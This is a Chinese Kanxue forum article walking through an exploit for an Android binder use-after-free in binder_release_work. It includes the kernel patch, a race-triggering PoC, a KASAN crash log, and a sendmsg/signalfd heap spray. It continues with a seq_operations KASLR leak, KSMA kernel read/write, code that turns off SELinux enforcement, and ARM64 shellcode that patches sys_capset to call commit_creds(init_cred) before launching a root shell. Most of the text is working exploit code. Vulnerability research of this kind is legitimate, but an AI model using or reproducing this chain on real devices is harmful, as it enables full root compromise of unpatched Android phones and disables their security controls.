本文为看雪论坛精华文章
看雪论坛作者ID:LowRebSwrd
简介
PoC 的触发
struct binder_node {
int debug_id;
spinlock_t lock;
struct binder_work work; //binder_work
union {
struct rb_node rb_node;
struct hlist_node dead_node;
};
patch前后
// Before the patch
static struct binder_work *binder_dequeue_work_head(
struct binder_proc *proc,
struct list_head *list)
{
struct binder_work *w;
binder_inner_proc_lock(proc);
w = binder_dequeue_work_head_ilocked(list);
binder_inner_proc_unlock(proc);
return w;
}
static void binder_release_work(struct binder_proc *proc,
struct list_head *list)
{
struct binder_work *w;
while (1) {
w = binder_dequeue_work_head(proc, list);
/*
* From this point on, there is no lock on `proc` anymore
* which means `w` could have been freed in another thread and
* therefore be pointing to dangling memory.
*/
if (!w)
return;
switch (w->type) { /* <--- Use-after-free occurs here */
// [...]
// After the patch
patch后
static void binder_release_work(struct binder_proc *proc,
struct list_head *list)
{
struct binder_work *w;
enum binder_work_type wtype;
while (1) {
binder_inner_proc_lock(proc);
/*
* Since the lock on `proc` is held while calling
* `binder_dequeue_work_head_ilocked` and reading the `type` field of
* the resulting `binder_work` stuct, we can be sure its value has not
* been tampered with.
*/
w = binder_dequeue_work_head_ilocked(list); //这里的对binder_work->w加了锁。
wtype = w ? w->type : 0;
binder_inner_proc_unlock(proc);
if (!w)
return;
switch (wtype) { /* <--- Use-after-free not possible anymore */
// [...]
/*
* Generates a binder transaction able to trigger the bug
*/
static inline void init_binder_transaction(int nb) {
/*
* Writes `nb` times a BINDER_TYPE_BINDER object in the object buffer
* and updates the offsets in the offset buffer accordingly
*/
for (int i = 0; i < nb; i++) {
struct flat_binder_object *fbo =
(struct flat_binder_object *)((void*)(MEM_ADDR + 0x400LL + i*sizeof(*fbo)));
fbo->hdr.type = BINDER_TYPE_BINDER;//这时候会创建binder_node
fbo->binder = i;
fbo->cookie = i;
uint64_t *offset = (uint64_t *)((void *)(MEM_ADDR + OFFSETS_START + 8LL*i));
*offset = i * sizeof(*fbo);
}
/*
* Binder transaction data referencing the offset and object buffers
*/
struct binder_transaction_data btd2 = {
.flags = TF_ONE_WAY, /* we don't need a reply */
.data_size = 0x28 * nb,
.offsets_size = 8 * nb,
.data.ptr.buffer = MEM_ADDR + 0x400,
.data.ptr.offsets = MEM_ADDR + OFFSETS_START,
};
uint64_t txn_size = sizeof(uint32_t) + sizeof(btd2);
/* Transaction command */
*(uint32_t*)(MEM_ADDR + 0x200) = BC_TRANSACTION;
memcpy((void*)(MEM_ADDR + 0x204), &btd2, sizeof(btd2));
/* Binder write/read structure sent to binder */
struct binder_write_read bwr = {
.write_size = txn_size * (1), // 1 txno
.write_buffer = MEM_ADDR + 0x200
};
memcpy((void*)(MEM_ADDR + 0x100), &bwr, sizeof(bwr));
}
void *trigger_thread_func(void *argp) {
unsigned long id = (unsigned long)argp;
int ret = 0;
int binder_fd = -1;
int binder_fd_copy = -1;
// Opening binder device
binder_fd = open("/dev/binder", O_RDWR);
if (binder_fd < 0)
perror("An error occured while opening binder");
for (;;) {
// Refill the memory region with the transaction
init_binder_transaction(1);
// Copying the binder fd
binder_fd_copy = dup(binder_fd);
// Sending the transaction
ret = ioctl(binder_fd_copy, BINDER_WRITE_READ, MEM_ADDR + 0x100); //创建binder_node
if (ret != 0)
debug_printf("BINDER_WRITE_READ did not work: %d", ret);
// Binder thread exit
ret = ioctl(binder_fd_copy, BINDER_THREAD_EXIT, 0);//从thread->todolist中出列,当返回之时,binder_node也会释放。
if (ret != 0)
debug_printf("BINDER_WRITE_EXIT did not work: %d", ret);
// Closing binder device
close(binder_fd_copy);
}
return NULL;
}
int main() {
pthread_t trigger_threads[NB_TRIGGER_THREADS];
// Memory region for binder transactions
mmap((void*)MEM_ADDR, MEM_SIZE, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_FIXED | MAP_ANONYMOUS, -1, 0);
// Init random
srand(time(0));
// Get rid of stdout/stderr buffering
setvbuf(stdout, NULL, _IONBF, 0);
setvbuf(stderr, NULL, _IONBF, 0);
// Starting trigger threads
debug_print("Starting trigger threads");
for (unsigned long i = 0; i < NB_TRIGGER_THREADS; i++) {
pthread_create(&trigger_threads[i], NULL, trigger_thread_func, (void*)i);//多线程来触发。
}
// Waiting for trigger threads
for (int i = 0; i < NB_TRIGGER_THREADS; i++)
pthread_join(trigger_threads[i], NULL);
return 0;
}
新用户态调用回溯
// Userland code from the exploit
int binder_fd = open("/dev/binder", O_RDWR);
ioctl(binder_fd, BINDER_THREAD_EXIT, 0)
static long binder_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
{
// [...]
case BINDER_THREAD_EXIT:
binder_debug(BINDER_DEBUG_THREADS, "%d:%d exit\n",
proc->pid, thread->pid);
binder_thread_release(proc, thread);
thread = NULL;
break;
// [...]
static int binder_thread_release(struct binder_proc *proc,
struct binder_thread *thread)
{
// [...]
binder_release_work(proc, &thread->todo);
binder_thread_dec_tmpref(thread);
return active_transactions;
}
static void binder_release_work(struct binder_proc *proc,
struct list_head *list)
{
struct binder_work *w;
while (1) {
w = binder_dequeue_work_head(proc, list); /* dequeues from thread->todo */
if (!w)
return;
// [...]
static int binder_translate_binder(struct flat_binder_object *fp,
struct binder_transaction *t,
struct binder_thread *thread)
{
// [...]
ret = binder_inc_ref_for_node(target_proc, node,
fp->hdr.type == BINDER_TYPE_BINDER,
&thread->todo, &rdata);
// [...]
}
static int binder_inc_ref_for_node(struct binder_proc *proc,
struct binder_node *node,
bool strong,
struct list_head *target_list,
struct binder_ref_data *rdata)
{
// [...]
ret = binder_inc_ref_olocked(ref, strong, target_list);
// [...]
}
static int binder_inc_node_nilocked(struct binder_node *node, int strong,
int internal,
struct list_head *target_list)
{
// [...]
if (strong) {
// [...]
if (!node->has_strong_ref && target_list) {
// [...]
binder_enqueue_deferred_thread_work_ilocked(thread,
&node->work); //当对这个node节点是强引用时
}
} else {
// [...]
if (!node->has_weak_ref && list_empty(&node->work.entry)) {
// [...]
binder_enqueue_work_ilocked(&node->work, target_list);//当是弱引用时。
}
}
return 0;
}
static void binder_free_node(struct binder_node *node)
{
kfree(node);
binder_stats_deleted(BINDER_STAT_NODE);
}
int binder_parse(struct binder_state *bs, struct binder_io *bio,
uintptr_t ptr, size_t size, binder_handler func)
{
// [...]
switch(cmd) {
// [...]
case BR_TRANSACTION_SEC_CTX:
case BR_TRANSACTION: {
// [...]
if (func) {
// [...]
if (txn.transaction_data.flags & TF_ONE_WAY) {
binder_free_buffer(bs, txn.transaction_data.data.ptr.buffer);
} else {
binder_send_reply(bs, &reply, txn.transaction_data.data.ptr.buffer, res);
}
}
break;
}
// [...]
static int binder_thread_write(struct binder_proc *proc,
struct binder_thread *thread,
binder_uintptr_t binder_buffer, size_t size,
binder_size_t *consumed)
{
// [...]
case BC_FREE_BUFFER: {
// [...]
binder_transaction_buffer_release(proc, buffer, 0, false);
// [...]
}
// [...]
static void binder_transaction_buffer_release(struct binder_proc *proc,
struct binder_buffer *buffer,
binder_size_t failed_at,
bool is_failure)
{
// [...]
switch (hdr->type) {
// [...]
case BINDER_TYPE_HANDLE:
case BINDER_TYPE_WEAK_HANDLE: {
struct flat_binder_object *fp;
struct binder_ref_data rdata;
int ret;
fp = to_flat_binder_object(hdr);
ret = binder_dec_ref_for_handle(proc, fp->handle,
hdr->type == BINDER_TYPE_HANDLE, &rdata);
// [...]
} break;
// [...]
static int binder_update_ref_for_handle(struct binder_proc *proc,
uint32_t desc, bool increment, bool strong,
struct binder_ref_data *rdata)
{
// [...]
if (increment)
ret = binder_inc_ref_olocked(ref, strong, NULL);
else
/*
* Decrements the reference count by one and returns true since it
* dropped to zero
*/
delete_ref = binder_dec_ref_olocked(ref, strong);
// [...]
/* delete_ref is true, the binder node is freed */
if (delete_ref)
binder_free_ref(ref);
return ret;
// [...]
}
static void binder_free_ref(struct binder_ref *ref)
{
if (ref->node)
binder_free_node(ref->node);
kfree(ref->death);
kfree(ref);
}
<3>[81169.367408] c6 20464 ==================================================================
<3>[81169.367435] c6 20464 BUG: KASAN: use-after-free in binder_release_work+0x84/0x1b8
<3>[81169.367469] c6 20464 Read of size 4 at addr ffffffc053e45850 by task poc/20464
<3>[81169.367481] c6 20464
<4>[81169.367498] c6 20464 CPU: 6 PID: 20464 Comm: poc Tainted: G S W 4.14.170-g551313822-dirty_audio-g199e9bf #1
<4>[81169.367507] c6 20464 Hardware name: Qualcomm Technologies, Inc. SM8150 V2 PM8150 Google Inc. MSM sm8150 Flame (DT)
<4>[81169.367514] c6 20464 Call trace:
<4>[81169.367530] c6 20464 dump_backtrace+0x0/0x380
<4>[81169.367541] c6 20464 show_stack+0x20/0x2c
<4>[81169.367554] c6 20464 dump_stack+0xc4/0x11c
<4>[81169.367576] c6 20464 print_address_description+0x70/0x240
<4>[81169.367594] c6 20464 kasan_report_error+0x1a0/0x204
<4>[81169.367605] c6 20464 kasan_report_error+0x0/0x204
<4>[81169.367619] c6 20464 __asan_load4+0x80/0x84 //引用
<4>[81169.367631] c6 20464 binder_release_work+0x84/0x1b8
<4>[81169.367644] c6 20464 binder_thread_release+0x2ac/0x2e0
<4>[81169.367655] c6 20464 binder_ioctl+0x9a4/0x122c
<4>[81169.367680] c6 20464 do_vfs_ioctl+0x7c8/0xefc
<4>[81169.367693] c6 20464 SyS_ioctl+0x68/0xa0
<4>[81169.367716] c6 20464 el0_svc_naked+0x34/0x38
<3>[81169.367725] c6 20464
<3>[81169.367734] c6 20464 Allocated by task 20464:
<4>[81169.367747] c6 20464 kasan_kmalloc+0xe0/0x1ac
<4>[81169.367761] c6 20464 kmem_cache_alloc_trace+0x3b8/0x454
<4>[81169.367774] c6 20464 binder_new_node+0x4c/0x394 //分配
<4>[81169.367802] c6 20464 binder_transaction+0x2398/0x4308
<4>[81169.367816] c6 20464 binder_ioctl_write_read+0xc28/0x4dc8
<4>[81169.367826] c6 20464 binder_ioctl+0x650/0x122c
<4>[81169.367836] c6 20464 do_vfs_ioctl+0x7c8/0xefc
<4>[81169.367846] c6 20464 SyS_ioctl+0x68/0xa0
<4>[81169.367862] c6 20464 el0_svc_naked+0x34/0x38
<3>[81169.367868] c6 20464
<4>[81169.367936] c7 20469 CPU7: update max cpu_capacity 989
<3>[81169.368496] c6 20464 Freed by task 594:
<4>[81169.368518] c6 20464 __kasan_slab_free+0x13c/0x21c
<4>[81169.368534] c6 20464 kasan_slab_free+0x10/0x1c
<4>[81169.368549] c6 20464 kfree+0x248/0x810 //释放
<4>[81169.368564] c6 20464 binder_free_ref+0x30/0x64
<4>[81169.368584] c6 20464 binder_update_ref_for_handle+0x294/0x2b0
<4>[81169.368600] c6 20464 binder_transaction_buffer_release+0x46c/0x7a0
<4>[81169.368616] c6 20464 binder_ioctl_write_read+0x21d0/0x4dc8
<4>[81169.368653] c6 20464 binder_ioctl+0x650/0x122c
<4>[81169.368667] c6 20464 do_vfs_ioctl+0x7c8/0xefc
<4>[81169.368684] c6 20464 SyS_ioctl+0x68/0xa0
<4>[81169.368697] c6 20464 el0_svc_naked+0x34/0x38
<3>[81169.368704] c6 20464
<3>[81169.368735] c6 20464 The buggy address belongs to the object at ffffffc053e45800
<3>[81169.368735] c6 20464 which belongs to the cache kmalloc-256 of size 256
<3>[81169.368753] c6 20464 The buggy address is located 80 bytes inside of
<3>[81169.368753] c6 20464 256-byte region [ffffffc053e45800, ffffffc053e45900)
<3>[81169.368767] c6 20464 The buggy address belongs to the page:
<0>[81169.368779] c6 20464 page:ffffffbf014f9100 count:1 mapcount:0 mapping: (null) index:0x0 compound_mapcount: 0
<0>[81169.368804] c6 20464 flags: 0x10200(slab|head)
<1>[81169.368824] c6 20464 raw: 0000000000010200 0000000000000000 0000000000000000 0000000100150015
<1>[81169.368843] c6 20464 raw: ffffffbf04e39e00 0000000e00000002 ffffffc148c0fa00 0000000000000000
<1>[81169.368867] c6 20464 page dumped because: kasan: bad access detected
<3>[81169.368882] c6 20464
<3>[81169.368894] c6 20464 Memory state around the buggy address:
<3>[81169.368910] c6 20464 ffffffc053e45700: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
<3>[81169.368955] c6 20464 ffffffc053e45780: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
<3>[81169.368984] c6 20464 >ffffffc053e45800: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
<3>[81169.368997] c6 20464 ^
<3>[81169.369012] c6 20464 ffffffc053e45880: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
<3>[81169.369037] c6 20464 ffffffc053e45900: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
<3>[81169.369049] c6 20464 ==================================================================
利用exploit
void *spray_thread_func(void *argp) {
struct spray_thread_data *data = (struct spray_thread_data*)argp;
int delay;
int msg_buf[SENDMSG_SIZE / sizeof(int)];
int ctl_buf[SENDMSG_CONTROL_SIZE / sizeof(int)];
struct msghdr spray_msg;
struct iovec siov;
uint64_t sigset_value;
// Sendmsg control buffer initialization
memset(&spray_msg, 0, sizeof(spray_msg));
ctl_buf[0] = SENDMSG_CONTROL_SIZE - WORK_STRUCT_OFFSET;
ctl_buf[6] = 0xdeadbeef; /* w->type value */
siov.iov_base = msg_buf;
siov.iov_len = SENDMSG_SIZE;
spray_msg.msg_iov = &siov;
spray_msg.msg_iovlen = 1;
spray_msg.msg_control = ctl_buf;
spray_msg.msg_controllen = SENDMSG_CONTROL_SIZE - WORK_STRUCT_OFFSET;
for (;;) {
// Barrier - Before spray
pthread_barrier_wait(&data->barrier);
// Waiting some time
delay = rand() % SPRAY_DELAY;
for (int i = 0; i < delay; i++) {}
for (uint64_t i = 0; i < NB_SIGNALFDS; i++) {
// Arbitrary signalfd value (will become relevant later)
sigset_value = ~0;
// Non-blocking sendmsg
sendmsg(data->sock_fds[0], &spray_msg, MSG_OOB);
// Signalfd call to pin sendmsg's control buffer in kernel memory
signalfd_fds[data->trigger_id][data->spray_id][i] = signalfd(-1, (sigset_t*)&sigset_value, 0);
if (signalfd_fds[data->trigger_id][data->spray_id][i] <= 0)
debug_printf("Could not open signalfd - %d (%s)\n", signalfd_fds[data->trigger_id][data->spray_id][i], strerror(errno));
}
// Barrier - After spray
pthread_barrier_wait(&data->barrier);
}
return NULL;
}
static void binder_release_work(struct binder_proc *proc,
struct list_head *list)
{
struct binder_work *w;
while (1) {
w = binder_dequeue_work_head(proc, list);
if (!w)
return;
switch (w->type) {
case BINDER_WORK_TRANSACTION: {
struct binder_transaction *t;
t = container_of(w, struct binder_transaction, work);
binder_cleanup_transaction(t, "process died.",
BR_DEAD_REPLY);
} break;
case BINDER_WORK_RETURN_ERROR: {
struct binder_error *e = container_of(
w, struct binder_error, work);
binder_debug(BINDER_DEBUG_DEAD_TRANSACTION,
"undelivered TRANSACTION_ERROR: %u\n",
e->cmd);
} break;
case BINDER_WORK_TRANSACTION_COMPLETE: {
binder_debug(BINDER_DEBUG_DEAD_TRANSACTION,
"undelivered TRANSACTION_COMPLETE\n");
kfree(w);
binder_stats_deleted(BINDER_STAT_TRANSACTION_COMPLETE);
} break;
case BINDER_WORK_DEAD_BINDER_AND_CLEAR:
case BINDER_WORK_CLEAR_DEATH_NOTIFICATION: {
struct binder_ref_death *death;
death = container_of(w, struct binder_ref_death, work);
binder_debug(BINDER_DEBUG_DEAD_TRANSACTION,
"undelivered death notification, %016llx\n",
(u64)death->cookie);
kfree(death);
binder_stats_deleted(BINDER_STAT_DEATH);
} break;
default:
pr_err("unexpected work type, %d, not freed\n",
w->type);
break;
}
}
}
static void binder_cleanup_transaction(struct binder_transaction *t,
const char *reason,
uint32_t error_code)
{
if (t->buffer->target_node && !(t->flags & TF_ONE_WAY)) {
binder_send_failed_reply(t, error_code);
} else {
binder_debug(BINDER_DEBUG_DEAD_TRANSACTION,
"undelivered transaction %d, %s\n",
t->debug_id, reason);
binder_free_transaction(t);
}
}
static void binder_free_transaction(struct binder_transaction *t)
{
struct binder_proc *target_proc = t->to_proc;
if (target_proc) {
binder_inner_proc_lock(target_proc);
if (t->buffer)
t->buffer->transaction = NULL;
binder_inner_proc_unlock(target_proc);
}
/*
* If the transaction has no target_proc, then
* t->buffer->transaction has already been cleared.
*/
kfree(t); //会最终释放
binder_stats_deleted(BINDER_STAT_TRANSACTION);
}
绕过kalsr
struct seq_operations {
void * (*start) (struct seq_file *m, loff_t *pos);
void (*stop) (struct seq_file *m, void *v);
void * (*next) (struct seq_file *m, void *v, loff_t *pos);
int (*show) (struct seq_file *m, void *v);
};
int proc_self = open("/proc/self", O_RDONLY);
/* Releasing the signalfd object that was corrupted by our overlapping one */
if (corrupt_fd)
close(corrupt_fd);
/* Checking the value read by the overlapping fd */
uint64_t = get_sigfd_sigmask(overlapping_fd);
debug_printf("Value @X after freeing `corrupt_fd`: 0x%lx", mask);
/* Allocating seq_operations objects so that it overlaps with our signalfd */
retry:
for (int i = 0; i < NB_SEQ; i++) {
seq_fd[i] = openat(proc_self, "stat", O_RDONLY);
if (seq_fd[i] < 0)
debug_printf("Could not allocate seq ops (%d - %s)", i, strerror(errno));
}
/* Reading the value after spraying */
mask = get_sigfd_sigmask(overlapping_fd);
debug_printf("Value @X after spraying seq ops: 0x%lx", mask);
/* Checking if the KASLR leak read meets the condition */
kaslr_leak = mask - SINGLE_START;
if ((kaslr_leak & 0xffff) != 0) {
debug_print("Could not leak KASLR slide");
/* If not, we close all seq_fds are try again */
for (int i = 0; i < NB_SEQ; i++) {
close(seq_fd[i]);
}
goto retry;
}
/* If it works we display the KASLR leak */
debug_printf("KASLR slide: %lx", kaslr_leak);
任意读写内核-ksma
后续root部分
1. 关掉selinux
/* selinux_enforcing address in the remapped kernel region */
uint64_t selinux_enforcing_addr = base + 0x80000 + SELINUX_ENFORCING;
debug_printf("Before: enforcing = %x\n", *(uint32_t *)selinux_enforcing_addr);
/* setting selinux_enforcing to 0 */
*(uint32_t *)selinux_enforcing_addr = 0;
debug_printf("After: enforcing = %x\n", *(uint32_t *)selinux_enforcing_addr);
2. get root.
#define LO_DWORD(addr) ((addr) & 0xffffffff)
#define HI_DWORD(addr) LO_DWORD((addr) >> 32)
/* Preparing addresses for the shellcode */
uint64_t sys_capset_addr = base + 0x80000 + SYS_CAPSET;
uint64_t init_cred_addr = kaslr_leak + INIT_CRED;
uint64_t commit_creds_addr = kaslr_leak + COMMIT_CREDS;
uint32_t shellcode[] = {
// commit_creds(init_cred)
0x58000040, // ldr x0, .+8
0x14000003, // b .+12
LO_DWORD(init_cred_addr),
HI_DWORD(init_cred_addr),
0x58000041, // ldr x1, .+8
0x14000003, // b .+12
LO_DWORD(commit_creds_addr),
HI_DWORD(commit_creds_addr),
0xA9BF7BFD, // stp x29, x30, [sp, #-0x10]!
0xD63F0020, // blr x1
0xA8C17BFD, // ldp x29, x30, [sp], #0x10
0x2A1F03E0, // mov w0, wzr
0xD65F03C0, // ret
};
/* Saving sys_capset current code */
uint8_t sys_capset[sizeof(shellcode)];
memcpy(sys_capset, sys_capset_addr, sizeof(sys_capset));
/* Patching sys_capset with our shellcode */
debug_print("Patching SyS_capset()\n");
memcpy(sys_capset_addr, shellcode, sizeof(shellcode));
/* Calling our patched version of sys_capset */
ret = capset(NULL, NULL);
debug_printf("capset returned %d", ret);
if (ret < 0) perror("capset failed");
/* Restoring sys_capset */
debug_print("Restoring SyS_capset()");
memcpy(sys_capset_addr, sys_capset, sizeof(sys_capset));
/* Starting a shell */
system("sh");
exit(0);
总结
看雪ID:LowRebSwrd
https://bbs.pediy.com/user-home-726411.htm
# 往期推荐
球分享
球点赞
球在看
点击“阅读原文”,了解更多!